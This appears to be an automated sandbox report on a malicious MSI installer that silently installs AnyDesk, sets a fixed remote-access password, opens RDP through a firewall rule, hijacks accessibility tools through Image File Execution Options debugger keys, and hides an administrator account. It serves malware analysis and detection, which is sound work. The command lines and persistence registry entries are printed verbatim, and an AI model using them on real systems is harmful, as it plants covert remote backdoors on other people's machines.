Source: anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/intl/$
Source: anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.linkedin.com/shareArticle?mini=true&url=https%3A//anydesk.com/&title=Try%20AnyDesk%20Rem
Source: anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.nayuki.io/page/qr-code-generator-library
Source: unknownDNS traffic detected: queries for: boot.net.anydesk.com
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeCode function: 11_2_004013DD CreateFileA,GlobalAlloc,GlobalAlloc,ReadFile,MultiByteToWideChar,MultiByteToWideChar,WSAStartup,socket,connect,send,send,Sleep,recv,shutdown,WSACleanup,
Source: anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: DirectDrawCreateEx
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\78c342.ipiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\78c341.msiJump to behavior
Source: C:\ProgramData\anydesk.exeCode function: 16_2_01042DFD
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_012A2DFD
Source: eee52229ee24a34cb61191d27a7b66f1.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: C:\Windows\System32\msiexec.exeProcess Stats: CPU usage > 98%
Source: anydesk.exe.11.drStatic PE information: No import functions for PE file found
Source: AnyDesk.exe.16.drStatic PE information: No import functions for PE file found
Source: anydesk.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AnyDesk.exe.16.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: unknown | Driver loaded: C:\Windows\System32\drivers\rdpdr.sys
Source: Joe Sandbox View | Dropped File: C:\ProgramData\anydesk\AnyDesk.exe AF61905129F377F5934B3BBF787E8D2417901858BB028F40F02200E985EE62F6
Source: C:\Windows\SysWOW64\icacls.exe | Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\icacls.exe | Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\expand.exe | Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\expand.exe | Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Memory allocated: 77740000 page execute and read and write
Source: C:\ProgramData\anydesk.exe | Memory allocated: 77620000 page execute and read and write
Source: C:\ProgramData\anydesk.exe | Memory allocated: 77740000 page execute and read and write
Source: C:\ProgramData\anydesk\AnyDesk.exe | Memory allocated: 77620000 page execute and read and write
Source: C:\ProgramData\anydesk\AnyDesk.exe | Memory allocated: 77740000 page execute and read and write
Source: 1.msi | Virustotal: Detection: 48%
Source: 1.msi | ReversingLabs: Detection: 30%
Source: C:\Windows\System32\VSSVC.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\MUI\Settings
Source: unknown | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\1.msi"
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: unknown | Process created: C:\Windows\System32\VSSVC.exe C:\Windows\system32\vssvc.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k swprv
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6381DE7DB6BAADD41D0E24C26E59EDFC
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 22388C515E15FC158EA4B11229C0F8D9 E Global\MSI0000
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\ProgramData\anydesk.exe c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
Source: unknown | Process created: C:\ProgramData\anydesk\AnyDesk.exe "C:\ProgramData\AnyDesk\AnyDesk.exe" --service
Source: unknown | Process created: C:\ProgramData\anydesk\AnyDesk.exe "C:\ProgramData\AnyDesk\AnyDesk.exe" --control
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo 31121985west|c:\programdata\anydesk\anydesk.exe --set-password
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo 31121985west"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\ProgramData\anydesk\AnyDesk.exe c:\programdata\anydesk\anydesk.exe --set-password
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Process created: C:\ProgramData\anydesk\AnyDesk.exe "c:\programdata\anydesk\anydesk.exe" --get-id
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files"
Source: C:\Windows\System32\VSSVC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Code function: 11_2_00401C0B OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,
Source: C:\ProgramData\anydesk.exe | File created: C:\Users\user\AppData\Roaming\AnyDesk
Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\~DF0154135B388C6B07.TMP
Source: classification engine | Classification label: mal100.evad.winMSI@34/28@4/5
Source: C:\Windows\SysWOW64\msiexec.exe | File read: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\msiwrapper.ini
Source: C:\ProgramData\anydesk\AnyDesk.exe | Mutant created: \BaseNamedObjects\Global\ad_connect_queue_2556_539387648_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2856_712703952_0_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2120_827364153_1_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2336_604751762_1_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exe | Mutant created: \BaseNamedObjects\Local\ad_trace_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2336_604751762_0_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2120_827364153_0_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2856_712703952_1_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exe | Mutant created: \BaseNamedObjects\Global\ad_707_gsystem_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_trace_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exe | Mutant created: \BaseNamedObjects\Session\1\ad_mailbox_2120_827364153_1_mtx
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Code function: 11_2_00401254 CreateDirectoryA,GetModuleHandleA,FindResourceA,LoadResource,SizeofResource,CreateFileA,WriteFile,CloseHandle,WriteFile,
Source: C:\Windows\SysWOW64\msiexec.exe | File written: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\msiwrapper.ini
Source: C:\ProgramData\anydesk\AnyDesk.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: 1.msi | Static file information: File size 4063232 > 1048576
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dda-64\privacy_feature\privacy_feature.pdb source: anydesk.exe, 00000010.00000002.1074972510.0000000001AFB000.00000004.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_loader\AnyDesk.pdb source: anydesk.exe, 00000010.00000002.1078177888.0000000001C1A000.00000002.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000014.00000002.1170344791.0000000001E7A000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm-32\win_dwm\win_dwm.pdb source: anydesk.exe, 00000010.00000002.1074972510.0000000001AFB000.00000004.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm-64\win_dwm\win_dwm.pdb source: anydesk.exe, 00000010.00000002.1074972510.0000000001AFB000.00000004.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dda-32\privacy_feature\privacy_feature.pdb source: anydesk.exe, 00000010.00000002.1074972510.0000000001AFB000.00000004.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_app\win_app.pdb source: anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_app\win_app.pdb` source: anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: SAS.pdbR source: anydesk.exe, 00000010.00000002.1074972510.0000000001AFB000.00000004.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: SAS.pdb source: anydesk.exe, 00000010.00000002.1074972510.0000000001AFB000.00000004.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\ProgramData\anydesk.exe | Unpacked PE file: 16.2.anydesk.exe.1040000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\anydesk\AnyDesk.exe | Unpacked PE file: 20.2.AnyDesk.exe.12a0000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\anydesk\AnyDesk.exe | Unpacked PE file: 21.2.AnyDesk.exe.12a0000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\anydesk\AnyDesk.exe | Unpacked PE file: 25.2.AnyDesk.exe.12a0000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\anydesk\AnyDesk.exe | Unpacked PE file: 26.2.AnyDesk.exe.12a0000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\anydesk.exe | Code function: 16_2_015A9805 push ecx; ret
Source: C:\ProgramData\anydesk\AnyDesk.exe | Code function: 20_2_01809805 push ecx; ret
Source: C:\ProgramData\anydesk\AnyDesk.exe | Code function: 20_2_01817257 LoadLibraryW,GetProcAddress,GetProcAddress,RtlEncodePointer,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | File created: C:\programdata\anydesk.exe
Source: C:\ProgramData\anydesk.exe | File created: C:\ProgramData\anydesk\AnyDesk.exe
Source: C:\Windows\SysWOW64\expand.exe | File created: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe (copy)
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI5BE8.tmp
Source: C:\Windows\SysWOW64\expand.exe | File created: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\$dpx$.tmp\eee52229ee24a34cb61191d27a7b66f1.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIB0A0.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIBA33.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIED31.tmp
Source: C:\Windows\SysWOW64\expand.exe | File created: C:\Windows\Logs\DPX\setupact.log
Source: C:\Windows\SysWOW64\expand.exe | File created: C:\Windows\Logs\DPX\setuperr.log

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe Debugger
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe Debugger
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe Debugger
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe Debugger
Source: C:\Windows\System32\msiexec.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\SystemRestore
Source: C:\Windows\System32\msiexec.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\VssapiPublisher

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Administartor
Source: C:\ProgramData\anydesk.exe | File opened: C:\ProgramData\AnyDesk\AnyDesk.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\anydesk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\anydesk\AnyDesk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe TID: 2948 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\msiexec.exe TID: 264 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\msiexec.exe TID: 868 | Thread sleep time: -660000s >= -30000s
Source: C:\Windows\System32\VSSVC.exe TID: 316 | Thread sleep time: -900000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2408 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2944 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2068 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2676 | Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 904 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe TID: 2492 | Thread sleep count: 1273 > 30
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe TID: 2492 | Thread sleep count: 647 > 30
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe TID: 2492 | Thread sleep count: 181 > 30
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe TID: 2492 | Thread sleep count: 47 > 30
Source: C:\ProgramData\anydesk.exe TID: 2012 | Thread sleep time: -300000s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 2184 | Thread sleep time: -420000s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 1224 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 1040 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 464 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 1544 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 2468 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 848 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 1656 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 672 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Thread sleep count: Count: 1273 delay: -10
Source: C:\ProgramData\anydesk\AnyDesk.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Window / User API: threadDelayed 1273
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Window / User API: threadDelayed 647
Source: C:\Windows\System32\svchost.exe | File opened / queried: scsi#disk&ven_vmware&prod_virtual_disk#5&22be343f&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: VSSVC.exe, 00000003.00000002.1168516119.000000000172F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: svchost.exe, 00000004.00000003.984456495.0000000000324000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#5&22be343f&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000004.00000002.1166912198.00000000002EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: svchost.exe, 00000004.00000002.1167619042.0000000001201000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: si#disk&ven_vmware&prod_virtual_disk#5&22be343f&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}>>
Source: svchost.exe, 00000004.00000003.984328347.0000000000324000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#5&22be343f&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b},
Source: svchost.exe, 00000004.00000002.1167619042.0000000001201000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#5&22be343f&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}00
Source: C:\ProgramData\anydesk.exeCode function: 16_2_015B0229 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_01817257 LoadLibraryW,GetProcAddress,GetProcAddress,RtlEncodePointer,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,
Source: C:\ProgramData\anydesk\AnyDesk.exeMemory protected: page read and write | page guard
Source: C:\ProgramData\anydesk.exeCode function: 16_2_015B0229 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_01810229 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_01810229 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_0180743D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_0180743D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\ProgramData\anydesk\AnyDesk.exeFile opened: Windows Firewall: C:\Windows\SysWOW64\FirewallAPI.dll
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6381DE7DB6BAADD41D0E24C26E59EDFC
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 22388C515E15FC158EA4B11229C0F8D9 E Global\MSI0000
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files"
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe"
